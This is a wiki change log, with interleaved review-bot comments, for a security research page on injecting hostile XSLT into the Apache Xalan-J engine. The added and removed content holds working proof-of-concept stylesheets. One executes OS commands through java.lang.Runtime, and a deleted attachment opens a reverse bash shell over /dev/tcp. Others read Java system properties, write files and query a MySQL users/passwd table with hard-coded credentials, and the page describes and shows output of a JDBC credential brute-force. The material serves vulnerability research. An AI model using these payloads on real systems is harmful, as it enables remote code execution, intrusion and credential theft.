Changes for page Engine_XalanJ
on 2012/01/12 22:13
on 2012/01/11 22:36
Summary
Page properties (1 modified, 0 added, 0 removed)
Attachments (0 modified, 0 added, 7 removed)
Details
- Page properties
- Content
... ... 
@@ -19,67 +19,36 @@ 19 19 20 20 == Special features == 21 21 22 -* Java properties disclosure 23 -* Java environment disclosure 24 -* Java code execution 25 -* OS command execution 26 26 * File creation 23 +* Code execution 27 27 * JDBC connectivity 25 +* Java properties disclosure 26 +* Java environment disclosure 28 28 29 -== Java properties disclosure==28 +== CheckEnv() == 30 30 31 -The xsl:system-property()standardfunction canbe calledwithnonstandardarguments, mappedtoJavaproperties. In thisexample,thenameoftheJava propertiesis storedinaseparateXMLfile([[properties.xml>>attach:properties.xml]]).The XSLT code will,for eachproperty,display its nameand itsvalue.30 +The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]), associated to the Xalan namespace, will display some information about the execution context (packages, paths, versions, ...). The output of the execution of [[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]] is [[attached>>attach:xalanj-checkenv-output.txt]]. 32 32 33 -|=Namespace|=Function|=PoC|=Sample output 34 -|http:~/~/www.w3.org/1999/XSL/Transform|system-property()|[[xalanj-java-properties.xsl>>attach:xalanj-java-properties.xsl]]|[[xalanj-java-properties-output.txt>>attach:xalanj-java-properties-output.txt]] 35 - 36 -== Java environment disclosure == 37 - 38 -The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]) will display some information about the execution context (including available packages, paths, versions, ...). 39 - 40 -|=Namespace|=Extension function|=PoC|=Sample output 41 -|http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]] 42 - 43 43 == Java code execution == 44 44 45 -The attachedcode will display the current dateusing a newly created "java.util.Date" object. 
This should be enough to demonstrate Java code execution.34 +The following code will display the current date : 46 46 47 -|=Namespace|=Extension function|=PoC|=Sample output 48 -|http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date: 49 -Wed Jan 11 22:45:07 CET 2012 36 +TODO 50 50 51 -== OScommandexecution ==38 +== Execution of external commands == 52 52 53 - OnceJava code execution is possible, it is trivialtoexecute arbitraryOScommands using thejava.lang.Runtime class. The attached PoCwillnot read theoutputoftheexecuted command(because loops are hard in XSLT). But thisis nota problemif a reverse-shellhave already been started, isn't it ;-)40 +The following code will execute the command "touch /tmp/hello" : 54 54 55 -|=Namespace|=Extension functions|=PoC 56 -|http:~/~/xml.apache.org/xalan/java|split(), getRuntime(), exec() and toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]] 57 - 58 -__Note__ : as arrays are not a native type in XSLT, we create one in Java via split() before passing it as an argument to [[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]]. 59 - 60 -== File creation == 61 - 62 -The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten. 63 - 64 -|=Namespace|=Extension element|=Parameter|=PoC 65 -|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]] 66 - 67 -== JDBC connectivity == 68 - 69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result. 
70 - 71 -|=Namespace|=Extension function|=PoC 72 -|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] 73 - 74 -=== Brute-force === 75 - 76 -The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-). 77 - 78 - 79 -Here's the output when launched from the CLI : 80 - 81 -##$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null 82 -Username : [root] / Password : [] : 83 -Username : [root] / Password : [uberpasswd] : 84 -Username : [root] / Password : [cnam] : OK !! 85 -Username : [pma] / Password : [pma] : ## 42 +<?xml version="1.0"?> 43 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform" 44 + xmlns:j="http:~/~/xml.apache.org/xalan/java" 45 + exclude-result-prefixes="j" 46 + version="1.0"> 47 + <xsl:template match="/"> 48 + <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable> 49 + <xsl:variable name="a" select="j:split($c, ' = ')"/> 50 + <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/> 51 + <xsl:variable name="p" select="j:exec($r, $a )"/> 52 + No content at the moment ... 53 + </xsl:template> 54 +</xsl:stylesheet>
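Review bot: the `== Special features ==` list in this hunk still advertises `File creation`, `JDBC connectivity`, `Java properties disclosure` and `Java environment disclosure`, but the `== File creation ==`, `== JDBC connectivity ==` (with its `=== Brute-force ===` subsection) and `== Java properties disclosure ==` sections are deleted in the same hunk and their attachments are removed below, so three of the five listed features now point at nothing; either keep those sections (the file-creation one carried the caveat that `redirect:write` can overwrite existing files, which a reader hardening a Xalan deployment wants to know) or trim the list to what the page still documents. Smaller points in the same hunk: `== Java code execution ==` now reads only `TODO` while the working `xalanj-java-date.xsl` example it replaced is deleted, so the section is empty until the date example is inlined the way the command example below it is; the deleted `__Note__` explaining that `split()` is used to build the `String[]` expected by `exec(String[] cmdarray)` is the only documentation of the `j:split($c, ' = ')` line in the new snippet and should be carried over; the new snippet binds `$p` to the `exec` result but never uses it (the template only emits "No content at the moment ..."), so either output `$p` or drop the variable; and the new `== CheckEnv() ==` heading matches neither the function it documents (`checkEnvironment()`) nor the `Java environment disclosure` entry in the feature list, whereas the old heading did.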
- properties.xml
- Author
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,1 +1,0 @@ 1 -2.7 KB - Content
... ... 
@@ -1,73 +1,0 @@ 1 -<properties> 2 -<property>awt.toolkit</property> 3 -<property>browser</property> 4 -<property>browser.vendor</property> 5 -<property>browser.version</property> 6 -<property>file.encoding</property> 7 -<property>file.encoding.pkg</property> 8 -<property>file.separator</property> 9 -<property>file.separator.applet</property> 10 -<property>http.agent</property> 11 -<property>java.awt.graphicsenv</property> 12 -<property>java.awt.printerjob</property> 13 -<property>java.class.path</property> 14 -<property>java.class.version</property> 15 -<property>java.class.version.applet</property> 16 -<property>java.endorsed.dirs</property> 17 -<property>java.ext.dirs</property> 18 -<property>java.home</property> 19 -<property>java.io.tmpdir</property> 20 -<property>java.library.path</property> 21 -<property>java.runtime.name</property> 22 -<property>java.runtime.version</property> 23 -<property>java.specification.name</property> 24 -<property>java.specification.vendor</property> 25 -<property>java.specification.version</property> 26 -<property>java.vendor</property> 27 -<property>java.vendor.applet</property> 28 -<property>java.vendor.url</property> 29 -<property>java.vendor.url.applet</property> 30 -<property>java.vendor.url.bug</property> 31 -<property>java.version</property> 32 -<property>java.version.applet</property> 33 -<property>java.vm.info</property> 34 -<property>java.vm.name</property> 35 -<property>java.vm.specification.name</property> 36 -<property>java.vm.specification.vendor</property> 37 -<property>java.vm.specification.version</property> 38 -<property>java.vm.vendor</property> 39 -<property>java.vm.version</property> 40 -<property>javax.accessibility.assistive_technologies</property> 41 -<property>line.separator</property> 42 -<property>line.separator.applet</property> 43 -<property>os.arch</property> 44 -<property>os.arch.applet</property> 45 -<property>os.name</property> 46 -<property>os.name.applet</property> 47 
-<property>os.version</property> 48 -<property>os.version.applet</property> 49 -<property>package.restrict.definition.java</property> 50 -<property>package.restrict.definition.sun</property> 51 -<property>path.separator</property> 52 -<property>path.separator.applet</property> 53 -<property>sun.arch.data.model</property> 54 -<property>sun.boot.class.path</property> 55 -<property>sun.boot.library.path</property> 56 -<property>sun.cpu.endian</property> 57 -<property>sun.cpu.isalist</property> 58 -<property>sun.desktop</property> 59 -<property>sun.io.unicode.encoding</property> 60 -<property>sun.java.launcher</property> 61 -<property>sun.jnu.encoding</property> 62 -<property>sun.management.compiler</property> 63 -<property>sun.os.patch.level</property> 64 -<property>user.country</property> 65 -<property>user.dir</property> 66 -<property>user.home</property> 67 -<property>user.language</property> 68 -<property>user.name</property> 69 -<property>user.timezone</property> 70 -<property>user.variant</property> 71 -<property>user.zoneinfo.dir</property> 72 -</properties> 73 -
- xalanj-java-date.xsl
- Author
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,1 +1,0 @@ 1 -409 bytes - Content
... ... @@ -1,11 +1,0 @@ 1 -<xsl:stylesheet version="1.0" 2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 3 - xmlns:date="http://xml.apache.org/xalan/java/java.util.Date" 4 - exclude-result-prefixes="date"> 5 - <xsl:output method="text"/> 6 - <xsl:template match="/"> 7 - <xsl:variable name="dateObject" select="date:new()"/> 8 - <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/> 9 - </xsl:template> 10 -</xsl:stylesheet> 11 -
- xalanj-java-properties-output.txt
- Author
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,1 +1,0 @@ 1 -2.8 KB - Content
... ... 
@@ -1,73 +1,0 @@ 1 -<?xml version="1.0" encoding="UTF-8"?> 2 -awt.toolkit: 3 -browser: 4 -browser.vendor: 5 -browser.version: 6 -file.encoding: UTF-8 7 -file.encoding.pkg: sun.io 8 -file.separator: / 9 -file.separator.applet: 10 -http.agent: 11 -java.awt.graphicsenv: sun.awt.X11GraphicsEnvironment 12 -java.awt.printerjob: sun.print.PSPrinterJob 13 -java.class.path: /usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/serializer.jar:/usr/share/java/xsltc.jar 14 -java.class.version: 50.0 15 -java.class.version.applet: 16 -java.endorsed.dirs: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/endorsed 17 -java.ext.dirs: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/ext:/usr/java/packages/lib/ext 18 -java.home: /usr/lib/jvm/java-6-sun-1.6.0.26/jre 19 -java.io.tmpdir: /tmp 20 -java.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386/client:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib 21 -java.runtime.name: Java(TM) SE Runtime Environment 22 -java.runtime.version: 1.6.0_26-b03 23 -java.specification.name: Java Platform API Specification 24 -java.specification.vendor: Sun Microsystems Inc. 25 -java.specification.version: 1.6 26 -java.vendor: Sun Microsystems Inc. 27 -java.vendor.applet: 28 -java.vendor.url: http://java.sun.com/ 29 -java.vendor.url.applet: 30 -java.vendor.url.bug: http://java.sun.com/cgi-bin/bugreport.cgi 31 -java.version: 1.6.0_26 32 -java.version.applet: 33 -java.vm.info: mixed mode, sharing 34 -java.vm.name: Java HotSpot(TM) Client VM 35 -java.vm.specification.name: Java Virtual Machine Specification 36 -java.vm.specification.vendor: Sun Microsystems Inc. 37 -java.vm.specification.version: 1.0 38 -java.vm.vendor: Sun Microsystems Inc. 
39 -java.vm.version: 20.1-b02 40 -javax.accessibility.assistive_technologies: 41 -line.separator: 42 - 43 -line.separator.applet: 44 -os.arch: i386 45 -os.arch.applet: 46 -os.name: Linux 47 -os.name.applet: 48 -os.version: 2.6.32-37-generic 49 -os.version.applet: 50 -package.restrict.definition.java: 51 -package.restrict.definition.sun: 52 -path.separator: : 53 -path.separator.applet: 54 -sun.arch.data.model: 32 55 -sun.boot.class.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/resources.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/rt.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jsse.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jce.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/charsets.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/classes 56 -sun.boot.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386 57 -sun.cpu.endian: little 58 -sun.cpu.isalist: 59 -sun.desktop: gnome 60 -sun.io.unicode.encoding: UnicodeLittle 61 -sun.java.launcher: SUN_STANDARD 62 -sun.jnu.encoding: UTF-8 63 -sun.management.compiler: HotSpot Client Compiler 64 -sun.os.patch.level: unknown 65 -user.country: FR 66 -user.dir: /home/bob/foobar 67 -user.home: /home/bob 68 -user.language: fr 69 -user.name: bob 70 -user.timezone: 71 -user.variant: 72 -user.zoneinfo.dir: 73 -
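Review bot: this deleted output file was captured on a real workstation (`user.name: bob`, `user.home: /home/bob`, `user.dir: /home/bob/foobar`, the full `/usr/lib/jvm/java-6-sun-1.6.0.26` paths and the complete classpath). That is precisely the environment detail `system-property()` exposes, which is the point of the example, but if the file is re-attached it is worth regenerating it in a throwaway VM or marking the user-specific values as sample data so a reader does not mistake the host details for part of the technique.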
- xalanj-java-properties.xsl
- Author
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,1 +1,0 @@ 1 -276 bytes - Content
... ... @@ -1,7 +1,0 @@ 1 -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" > 2 - <xsl:template match="//property"> 3 - <xsl:variable name="p" select="text()"/> 4 - <xsl:value-of select="$p"/>: <xsl:value-of select="system-property($p)"/> 5 - </xsl:template> 6 -</xsl:stylesheet> 7 -
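Review bot: the deleted stylesheet declares no `<xsl:output method="text"/>`, which is why the companion output file above starts with `<?xml version="1.0" encoding="UTF-8"?>` (with only text nodes emitted, the default output method is xml); the `xalanj-java-date.xsl` file removed in this same change does declare it. If this file is restored, add the output declaration for consistency and a cleaner sample output.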
- xalanj-jdbc-query.xsl
- Author
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,1 +1,0 @@ 1 -848 bytes - Content
... ... @@ -1,22 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:sql="org.apache.xalan.lib.sql.XConnection" 3 - extension-element-prefixes="sql" 4 - version="1.0"> 5 - 6 -<xsl:output method="xml" indent="yes"/> 7 - 8 -<xsl:param name="driver" select="'com.mysql.jdbc.Driver'"/> 9 -<xsl:param name="dburl" select="'jdbc:mysql://localhost/test_db'"/> 10 -<xsl:param name="user" select="'root'"/> 11 -<xsl:param name="pass" select="'14m31337'"/> 12 -<xsl:param name="query" select="'SELECT uid,username,passwd FROM users'"/> 13 - 14 -<xsl:template match="/"> 15 - <xsl:variable name="dbh" select="sql:new($driver, $dburl, $user, $pass)"/> 16 - <xsl:variable name="table" select='sql:query($dbh, $query)'/> 17 - <xsl:copy-of select="$table" /> 18 - <xsl:value-of select="sql:close($db)"/> 19 -</xsl:template> 20 - 21 -</xsl:stylesheet> 22 -
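Review bot: the deleted stylesheet has a variable mismatch: the connection handle is declared as `$dbh` (`sql:new($driver, $dburl, $user, $pass)`) but the close call is `sql:close($db)`, so `$db` is an undeclared variable, which Xalan reports as an error, and the connection is never closed. If the file comes back (the feature list still carries `JDBC connectivity`), change the last call to `sql:close($dbh)`. It also embeds live-looking credentials (`'root'` / `'14m31337'`) and a query against a `users` table with a `passwd` column; obvious placeholder values would make it clearer that these are sample inputs for the PoC.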
- xalanj-reverse-bash.xsl
- Author
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,1 +1,0 @@ 1 -1002 bytes - Content
... ... @@ -1,31 +1,0 @@ 1 -<xsl:stylesheet 2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 3 - xmlns:jv="http://xml.apache.org/xalan/java" 4 - exclude-result-prefixes="jv" 5 - version="1.0"> 6 - 7 - <xsl:template match="/"> 8 - 9 - <xsl:variable name="test"><![CDATA[/bin/bash ==== -c ==== /bin/bash 7<>/dev/tcp/127.0.0.1/4444 <&7 >&7]]></xsl:variable> 10 - <xsl:variable name="a" select="jv:split($test, ' ==== ')"/> 11 - <xsl:variable name="rtobject" select="jv:java.lang.Runtime.getRuntime()"/> 12 - <xsl:variable name="process" select="jv:exec($rtobject, $a )"/> 13 - 14 -Objet "String" : 15 - <xsl:value-of select="$test"/> 16 - 17 -Objet "Array" : 18 - <xsl:variable name="aAsString" select="jv:toString($a)"/> 19 - <xsl:value-of select="$aAsString"/> 20 - 21 -Objet "Runtime" : 22 - <xsl:variable name="rtobjectAsString" select="jv:toString($rtobject)"/> 23 - <xsl:value-of select="$rtobjectAsString"/> 24 - 25 -Objet "Process" : 26 - <xsl:variable name="processAsString" select="jv:toString($process)"/> 27 - <xsl:value-of select="$processAsString"/> 28 - 29 - </xsl:template> 30 -</xsl:stylesheet> 31 -
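Review bot: the output labels in the deleted file are French (`Objet "String"`, `Objet "Array"`, `Objet "Runtime"`, `Objet "Process"`) while the rest of the page is in English; if the file is restored they should read `Object`. The file is also the only place that showed the `jv:toString()` calls referenced in the deleted `split(), getRuntime(), exec() and toString()` table row, so the page content should either keep that row or stop mentioning `toString()`.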
- xalanj-write.xsl
- Author
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,1 +1,0 @@ 1 -373 bytes - Content
... ... @@ -1,13 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:redir="http://xml.apache.org/xalan/redirect" 3 - extension-element-prefixes="redir" 4 - version='1.0'> 5 - 6 - <xsl:template match="/"> 7 - <redir:write file="/tmp/created_by_xalanj_write" method="text"> 8 - <xsl:text>Just a PoC</xsl:text> 9 - </redir:write> 10 - </xsl:template> 11 - 12 -</xsl:stylesheet> 13 -